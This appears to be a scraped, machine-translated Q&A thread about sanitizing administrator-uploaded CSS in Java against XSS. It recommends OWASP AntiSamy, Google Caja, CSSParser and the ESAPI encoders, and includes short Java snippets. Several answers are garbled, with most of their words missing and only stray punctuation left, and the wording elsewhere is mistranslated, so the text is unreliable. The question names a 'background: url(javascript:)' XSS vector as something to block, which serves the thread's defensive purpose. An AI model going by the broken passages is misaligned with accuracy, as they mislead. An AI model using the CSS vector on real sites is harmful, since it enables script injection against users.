Geek asks and answers

Sanitize CSS with Java

Is there a good library in Java for disinfecting CSS styles? We would like to let administrators upload CSS stylesheets to control the look of the part of the site they administer. Naturally, we do not want to use allox XSS attacks, such as background: url (javascript :), so we are looking for a good solution for sanitization.

The only thing I have found so far that I liked is using Google Caja CssTree parser to exclude dangerous tags from CSS. I can end up using something like this, but if someone knows about the library, I don’t need to call so many dependencies and fetch, which would be useful.

Used AntiSamy library such as Vineet Reynolds offered by

        Policy policy = Policy.getInstance("antisamy.xml");
        ResourceBundle messages = ResourceBundle.getBundle("AntiSamy", Locale.getDefault());

        CssScanner scanner = new CssScanner(policy, messages);
        CleanResults results = scanner.scanStyleSheet(stylesheet, Integer.MAX_VALUE);
+3
source share
4 answers

OWASP AntiSamy can check CSS style sheets; However, I have not tried this feature. Also, I'm not sure if this matches your account with a project with too many dependencies. It uses Apache Batik for internal style sheet analysis.

If I were safe, I would not worry about downstream dependencies; I would choose the right tool for the task.

+3
source

Java StyleSheet CSS ( , ..). , , - ( , !)

0

, CSSParser Flying

, .

0

OWASP Top Ten , - . OWASP ESAPI XSS. ESAPI , , Java,.NET, PHP, Classic ASP, Cold Fusion, Python Haskell. , :

encodeForHTML
encodeForHTMLAttribute
encodeForJavaScript
encodeForCSS
encodeForURL

, , :

boolean isValidURL = ESAPI.validator().isValidInput("URLContext", userURL, "URL", 255, false);

Some organizations using ESAPI include American Express, Apache Foundation, Booz Allen Hamilton, Aspect Security, Foundstone (McAfee), Hartford, Infinite Campus, Lockheed Martin, MITER, US Navy - SPAWAR, World Bank, SANS Institute.

I also recommend giving them an XSS Prevention Cheat Sheet read that describes best practices for building your protection against XSS (in essence, it comes down to the fact that you MUST use the escape syntax for the part of the HTML document into which you are placing untrusted data).

0
source

More articles:


All Articles